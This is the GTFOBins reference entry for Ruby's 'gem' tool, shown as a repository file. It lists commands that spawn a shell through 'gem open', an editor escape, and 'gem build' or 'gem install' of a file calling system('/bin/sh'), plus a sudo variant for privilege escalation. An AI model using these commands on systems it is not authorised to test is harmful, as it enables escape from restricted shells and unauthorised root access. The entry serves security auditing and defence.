GTFOBins.github.io/_gtfobins/gem.md

24 lines
1023 B
Markdown
Raw Normal View History

2020-03-14 11:56:23 +01:00
---
functions:
shell:
- description: This requires the name of an installed gem to be provided (`json` is usually installed).
code: gem open -e "/bin/sh -c /bin/sh" json
- description: This invokes the default editor, which is likely to be [`vi`](/gtfobins/vi/), other functions may apply. This requires the name of an installed gem to be provided (`json` is usually installed).
code: |
gem open json
:!/bin/sh
- description: This executes the specified file as [`ruby`](/gtfobins/ruby/) code.
code: |
TF=$(mktemp -d)
echo 'system("/bin/sh")' > $TF/x
sudo gem build $TF/x
- description: This executes the specified file as [`ruby`](/gtfobins/ruby/) code.
code: |
TF=$(mktemp -d)
echo 'system("/bin/sh")' > $TF/x
sudo gem install --file $TF/x
sudo:
- description: This requires the name of an installed gem to be provided (`json` is usually installed).
code: sudo gem open -e "/bin/sh -c /bin/sh" json
---